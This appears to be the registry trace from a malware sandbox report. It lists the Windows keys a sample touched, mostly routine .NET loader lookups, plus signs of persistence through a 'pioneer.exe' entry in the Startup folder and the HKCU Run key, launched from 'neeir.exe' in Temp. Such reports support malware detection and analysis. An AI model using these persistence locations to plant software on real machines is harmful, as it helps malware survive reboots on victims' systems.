HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\MissingDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ConfigMask HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ConfigString HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\MVID HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\EvalationData HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ILDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\NIDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\MissingDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ConfigMask HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ConfigString HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\MVID HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\EvalationData HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ILDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\NIDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\MissingDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Windows.Forms,2.0.0.0,,b77a5c561934e089,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Drawing__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Drawing,2.0.0.0,,b03f5f7f11d50a3a,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System__b77a5c561934e089 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System,2.0.0.0,,b77a5c561934e089,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Xml__b77a5c561934e089 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Xml,2.0.0.0,,b77a5c561934e089,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Configuration__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Configuration,2.0.0.0,,b03f5f7f11d50a3a,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Deployment__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Deployment,2.0.0.0,,b03f5f7f11d50a3a,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Runtime.Serialization.Formatters.Soap__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Runtime.Serialization.Formatters.Soap,2.0.0.0,,b03f5f7f11d50a3a,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.Accessibility__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\Accessibility,2.0.0.0,,b03f5f7f11d50a3a,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Security__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Security,2.0.0.0,,b03f5f7f11d50a3a,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Policy\APTCA HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.mscorlib.resources_it-IT_b77a5c561934e089 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5e8c75c\40dcb014 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-1822907384-1282624486-319450072-1000\Installer\Assemblies\C:|Users|Seven01|AppData|Local|Temp|neeir.exe HKEY_CURRENT_USER\Software\Microsoft\Installer\Assemblies\C:|Users|Seven01|AppData|Local|Temp|neeir.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Assemblies\C:|Users|Seven01|AppData|Local|Temp|neeir.exe HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-1822907384-1282624486-319450072-1000\Installer\Assemblies\Global HKEY_CURRENT_USER\Software\Microsoft\Installer\Assemblies\Global HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Assemblies\Global HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Windows Error Reporting\WMR HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\Windows Error Reporting\WMR\Disable HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.mscorlib.resources_it_b77a5c561934e089 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5e8c75c\1ffc8ca7 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\202d978f\318c17e0 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\202d978f\4a0f2eda HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa\FipsAlgorithmPolicy HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy\Enabled HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\4ad60644\6f323003 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d1b2185\235dd0a9 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d1b2185\9e47f51 HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\GRE_Initialize HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DisableUNCCheck HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\EnableExtensions HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DelayedExpansion HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DefaultColor HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\CompletionChar HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\PathCompletionChar HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\AutoRun HKEY_CURRENT_USER\Software\Microsoft\Command Processor HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DisableUNCCheck HKEY_CURRENT_USER\Software\Microsoft\Command Processor\EnableExtensions HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DelayedExpansion HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DefaultColor HKEY_CURRENT_USER\Software\Microsoft\Command Processor\CompletionChar HKEY_CURRENT_USER\Software\Microsoft\Command Processor\PathCompletionChar HKEY_CURRENT_USER\Software\Microsoft\Command Processor\AutoRun HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\it-IT HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\it-IT HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Locale HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Locale\Alternate Sorts HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Language Groups HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\00000410 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Language Groups\1 HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\pioneer.exe HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-1822907384-1282624486-319450072-1000\Installer\Assemblies\C:|Users|Seven01|AppData|Roaming|Microsoft|Windows|Start Menu|Programs|Startup|pioneer.exe HKEY_CURRENT_USER\Software\Microsoft\Installer\Assemblies\C:|Users|Seven01|AppData|Roaming|Microsoft|Windows|Start Menu|Programs|Startup|pioneer.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Assemblies\C:|Users|Seven01|AppData|Roaming|Microsoft|Windows|Start Menu|Programs|Startup|pioneer.exe HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\ConfigMask HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\ConfigString HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\MVID HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\EvalationData HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\ILDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\NIDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\MissingDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Data.SqlXml__b77a5c561934e089 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Data.SqlXml,2.0.0.0,,b77a5c561934e089,MSIL HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\pioneer
Read Keys
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\InstallRoot HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\CLRLoadLogDir HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\UseLegacyV2RuntimeActivationPolicyDefaultValue HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\OnlyUseLatestCLR HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Fusion\NoClientChecks HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\SideBySide\PreferExternalManifest HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\GCStressStart HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\GCStressStartAtJit HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\DisableConfigCache HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\CacheLocation HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DownloadCacheQuotaInKB HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\EnableLog HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LoggingLevel HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\ForceLog HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogFailures HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\VersioningLog HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogResourceBinds HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\UseLegacyIdentityFormat HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DisableMSIPeek HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NoClientChecks HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DevOverrideEnable HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\LatestIndex HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index149\NIUsageMask HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index149\ILUsageMask HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ConfigMask HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ConfigString HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\MVID HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\EvalationData HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ILDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\NIDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\MissingDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\mscorlib,2.0.0.0,,b77a5c561934e089,x86 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\Latest HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\index21 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\LegacyPolicyTimeStamp HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ConfigMask HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ConfigString HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\MVID HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\EvalationData HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ILDependencies 